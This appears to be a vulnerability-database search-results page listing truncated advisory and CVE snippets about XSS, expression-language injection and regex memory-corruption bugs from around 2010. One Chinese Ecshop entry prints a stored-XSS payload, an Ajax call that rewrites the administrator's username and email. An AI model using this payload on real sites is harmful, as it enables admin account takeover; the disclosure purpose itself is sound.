9083 matches found
XSS vulnerability in Expression CMS
Vulnerability ID: HTB22618 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinexpressioncms1.html Product: Expression Vendor: Backbone Technology http://www.backbonetechnology.com Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions Vendor Notification: 22 September 201...
Expression Cross Site Scripting
=================================== Vulnerability ID: HTB22618 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinexpressioncms1.html Product: Expression Vendor: Backbone Technology http://www.backbonetechnology.com Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions...
Cross-site Scripting (XSS) Vulnerabilities in Expression CMS
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Expression CMS which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerability in Expression CMS 1.1 The vulnerability exists due to input sanitation error in the...
Ecshop2.7.2持久型XSS(可获得管理员帐号)
简要描述: 个人资料修改时,Javascript代码过滤不够严格,XSS代码直接进入数据库 详细说明: 密码保护问题这一项,没有使用正则过滤,其他的的都有正则过滤。我们可以在密码保护问题里输入XSS,但是后台查看会员资料是不显示密码保护问题的,所以这里必须要网站后台添加了新的 “会员注册项”时,后台查看资料就会显示了,此处填入一段引入外部js的代码:" 外部test.js文件内容如下 Ajax.call'privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"; 漏洞证明:...
CVE-2010-1870
The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "" protection mechanis...
perl regular expression UTF parsing errors
Buffer overflow in the polymorphic opcode support in the Regular Expression Engine regcomp.c in Perl 5.8 allows context-dependent attackers to execute arbitrary code by switching from byte to Unicode UTF characters in a regular expression...
PT-2010-1176 · Red Hat · Jboss Seam 2 +1
Name of the Vulnerable Software and Affected Versions: JBoss Seam 2 versions 2.0 through 2.3 JBoss Enterprise Application Platform version 4.3.0 Description: The issue is related to the improper sanitization of inputs for JBoss Expression Language EL expressions in JBoss Seam 2, which can be...
CVE-2010-1792
WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of service memory corruption and application crash via a crafted regular expression...
Memory corruption
WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of service memory corruption and application crash via a crafted regular expression...
CVE-2010-1792
WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of service memory corruption and application crash via a crafted regular expression...
CVE-2010-1792
Removed by vendor...
Seam2: Improper sanitization of parametrized JBoss EL expressions (ACE)
JBoss Seam 2 jboss-seam2, as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language EL expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when th...
CVE-2010-2086
Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements via vectors that...
DEBIAN-CVE-2010-2087
Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements v...
CVE-2010-2087
Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements v...
CVE-2010-2087
Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements v...
Cross site scripting
Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements via vectors that...
CVE-2010-2086
Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements via vectors that...
CVE-2010-2087
Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements v...
CVE-2010-2087
Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting XSS attacks or execute arbitrary Expression Language EL statements v...